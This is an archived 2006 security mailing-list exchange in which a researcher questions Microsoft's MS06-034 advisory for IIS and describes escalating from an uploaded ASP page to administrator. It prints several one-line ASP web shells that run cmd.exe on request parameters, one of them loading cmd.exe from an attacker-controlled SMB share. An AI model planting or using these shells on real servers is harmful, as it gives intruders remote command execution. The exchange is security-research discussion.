Dailydave mailing list archives
Re: MS06-034 lies? IIS 6 can still be owned?
From: Cesar <sqlsec () yahoo com>
Date: Wed, 26 Jul 2006 06:50:08 -0700 (PDT)
Some corrections: I forgot to mention that for the remote asp shell you will need permissions on cmd.exe because by default it can't be accessed but you can use the next (or other tricks available): <%=server.createobject("wscript.shell").exec(Server.MapPath("youruploadedCmd.exe")& " /c " & response("cmd")).stdout.readall %> Also it's not necesary to upload a binary to the server since you can: <%=server.createobject("wscript.shell").exec("\\attackerip\share\cmd.exe" & " /c " & response("cmd")).stdout.readall %> Thanks a lot to Brett for pointing out the cmd.exe permissions issue. Cesar. --- Cesar <sqlsec () yahoo com> wrote:
MS06-034 lies? IIS 6 can still be owned? Hi all. After early getting the details of MS06-034 I thought it will be cool to build the exploits since there has been long time without any IIS exploit and our customers (see *1) will like it, so I asked the guys to build the exploits and that I will take care of the part of elevating privileges since I had some theory that there was a way to elevate privilegs. What was funny is that some time later I realized that if you can upload an asp page then it's pretty simple to have a remote shell running under the same account that the exploits would run: -----shell.asp (got this from xfocus.org)------
<%=server.createobject("wscript.shell").exec("cmd.exe
/c " & request("command")).stdout.readall%> ------------------------------------------- So I wonder why MS patched the vulnerability if it's pretty simple to have a remote shell on default configurations? Mabye because wscript.shell can be disabled, removed, etc. or you can't run not upload .exe on the server, in these cases the exploit will be handy. Also MS stated: ----------------------------- on Mitigating Factors .... On IIS 5.0 and IIS 5.1, ASP enabled applications by default run in the 'Pooled Out of Process' application, which means they run in DLLHOST.exe, which is running in the context of the low privilege IWAM_<machinename> account. By default, ASP is not enabled on IIS 6.0. If ASP is enabled, it runs in the context of a W3WP.exe worker process running as the low privilege 'NetworkService' account. on FAQ Workarounds... -What might an attacker use the vulnerability to do? An attacker who successfully exploited this vulnerability could take complete control of the affected system. ---------------------- That's pretty confusing since they are saying IIS 5 & 6 runs under a low privileged accounts and then they say an attacker could take complete control...??? My theory on the elevation of privileges was in part wrong but I could elevate privileges so now the exploits can also give you a remote shell under an administrative account which I think this is why MS patched the vulnerability. While MS fixed the ASP vulnerability they didn't fixed a design flaw that allows to elevate privilges if you can run code under IIS 5 & 6 low privileged accounts :) So now we will have available for our customers: iisroot.exe that if ran from an ASP (.NET also) web page on default settings it can own IIS 6 (and the server of course). Cesar. (*1 http://www.argeniss.com/products.html) __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
__________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- MS06-034 lies? IIS 6 can still be owned? Cesar (Jul 25)
- Re: MS06-034 lies? IIS 6 can still be owned? Cesar (Jul 26)